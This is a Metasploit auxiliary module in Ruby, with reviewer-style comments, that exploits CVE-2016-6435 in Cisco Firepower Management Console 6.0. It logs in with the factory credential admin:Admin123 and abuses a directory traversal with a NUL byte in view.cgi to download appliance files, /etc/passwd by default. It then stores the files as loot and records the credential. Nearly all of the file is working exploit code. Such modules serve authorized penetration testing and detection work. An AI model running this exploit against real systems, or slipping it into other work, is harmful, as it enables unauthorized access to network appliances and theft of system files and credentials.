##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  # Scanner supplies the per-target run_host loop; Report supplies
  # create_credential / create_credential_login / store_loot; HttpClient supplies
  # send_request_cgi, normalize_uri and target_uri used below.
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and datastore options.
  #
  # DefaultOptions point at the management console over HTTPS on 443. USERNAME and
  # PASSWORD default to the vendor factory credential noted below, so a run with
  # unchanged options doubles as a default-credential check before the traversal
  # request is ever sent. FILEPATH is the absolute path on the appliance to retrieve.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
      'Description' => %q{
        This module exploits a directory traversal vulnerability in Cisco Firepower Management
        under the context of www user. Authentication is required to exploit this vulnerability.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Matt', # Original discovery && PoC
          'sinn3r', # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2016-6435'],
          ['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']
        ],
      'DisclosureDate' => '2016-10-10',
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL' => true,
          'SSLVersion' => 'Auto'
        }
    ))

    register_options(
      [
        # admin:Admin123 is the default credential for 6.0.1
        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])
      ])
  end

  # Authenticates to the console's login.cgi with the USERNAME/PASSWORD options.
  #
  # @param ip [String] target address; only used when reporting the credential
  # @return [String, nil] the CGISESSID cookie value on success; nil when the
  #   response is not a 302 carrying a CGISESSID cookie, or when the cookie
  #   value could not be extracted from the cookie string
  # @raise fail_with(Failure::Unknown) when no HTTP response comes back at all.
  #   NOTE(review): fail_with raises out of run_host; whether the Scanner mixin
  #   then continues with the next host or stops the whole sweep is not visible
  #   here — confirm before relying on this in multi-host runs.
  def do_login(ip)
    console_user = datastore['USERNAME']
    console_pass = datastore['PASSWORD']
    uri = normalize_uri(target_uri.path, 'login.cgi')

    # The password is echoed in cleartext into console output (and any log that
    # captures it); the same happens again in the print_good below.
    print_status("Attempting to login in as #{console_user}:#{console_pass}")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'username' => console_user,
        'password' => console_pass,
        'target' => ''
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
    end

    # Success criterion: a 302 redirect whose Set-Cookie carries CGISESSID. The
    # session value is pulled from the cookie string with a regex that requires a
    # trailing ';'. NOTE(review): if that regex does not match, cgi_sid is nil but
    # the credential is still reported as valid and nil is returned, which
    # run_host then treats as a login failure — confirm get_cookies always
    # terminates each cookie with ';'.
    res_cookie = res.get_cookies
    if res.code == 302 && res_cookie.include?('CGISESSID')
      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
      vprint_status("CGI Session ID: #{cgi_sid}")
      print_good("Authenticated as #{console_user}:#{console_pass}")
      report_cred(ip: ip, user: console_user, password: console_pass)
      return cgi_sid
    end

    nil
  end

  # Records a working console credential in the database as a successful login.
  #
  # Called keyword-style from do_login; the keywords are collected into the
  # +opts+ hash. Only :ip, :user and :password are passed by the caller, so
  # :proof is always nil in the stored login record.
  #
  # @param opts [Hash] :ip target address, :user username, :password password,
  #   :proof optional evidence string (unused by the caller in this file)
  # @return the result of create_credential_login
  def report_cred(opts)
    # Service tuple shared by both the credential core and the login record.
    service_data = {
      address: opts[:ip],
      port: rport,
      service_name: 'cisco',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Requests +file+ through the authenticated report-download endpoint.
  #
  # The value sent in the +files+ GET parameter is the normalized unix path
  # prefixed with "../../.." and terminated with a NUL byte; the request goes to
  # events/reports/view.cgi with download=1 and the CGISESSID cookie from
  # do_login. That parameter shape (traversal prefix plus embedded NUL in a
  # view.cgi query) is the on-the-wire signature of this module's traffic and is
  # what a web/application log review or IDS rule for this issue would key on.
  #
  # @param cgi_sid [String] session id returned by do_login
  # @param file [String] absolute path on the appliance (the FILEPATH option)
  # @return the send_request_cgi response, or nil when no response is received
  #   (run_host reports nil as a timeout)
  def download_file(cgi_sid, file)
    file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
    print_status("Requesting: #{file_path}")
    send_request_cgi({
      'method' => 'GET',
      'cookie' => "CGISESSID=#{cgi_sid}",
      'uri' => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
      'vars_get' => {
        'download' => '1',
        'files' => file_path
      }
    })
  end

  # Heuristic for "the download endpoint returned file content".
  #
  # True only when the response has a Content-Disposition header containing
  # "attachment; filename=" AND a Content-Type header exactly equal to
  # "application/octet-stream". Any other response (presumably an HTML page)
  # evaluates to nil/false and is reported by run_host as "file not found".
  #
  # @param res response object from download_file (must not be nil)
  # @return [true, false, nil] truthy iff both header checks pass
  def remote_file_exists?(res)
    (
      res.headers['Content-Disposition'] &&
      res.headers['Content-Disposition'].match(/attachment; filename=/) &&
      res.headers['Content-Type'] &&
      res.headers['Content-Type'] == 'application/octet-stream'
    )
  end

  # Stores the response body as loot and prints the on-disk path.
  #
  # The loot filename comes from the server's Content-Disposition header, falling
  # back to the basename of FILEPATH when the header has no filename= part.
  # NOTE(review): that header value is chosen by the remote server, i.e. by the
  # scanned host; this code relies on store_loot sanitizing the name before it
  # touches the local filesystem — confirm rather than assume.
  #
  # @param res response that passed remote_file_exists?
  # @param ip [String] target address, recorded with the loot
  def save_file(res, ip)
    fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])

    path = store_loot(
      'cisco.https',
      'application/octet-stream',
      ip,
      res.body,
      fname
    )

    print_good("File saved in: #{path}")
  end

  # Scanner entry point, invoked once per target address.
  #
  # Flow: authenticate (do_login), abort via fail_with if no session id was
  # obtained, request FILEPATH (download_file), then either store the body as
  # loot or print why not. A nil response is reported as a timeout; a response
  # that fails remote_file_exists? is reported as "file not found".
  #
  # @param ip [String] target address
  def run_host(ip)
    cgi_sid = do_login(ip)

    unless cgi_sid
      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
    end

    res = download_file(cgi_sid, datastore['FILEPATH'])

    if res.nil?
      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
    elsif remote_file_exists?(res)
      save_file(res, ip)
    else
      print_error("Remote file not found: #{datastore['FILEPATH']}")
    end
  end
end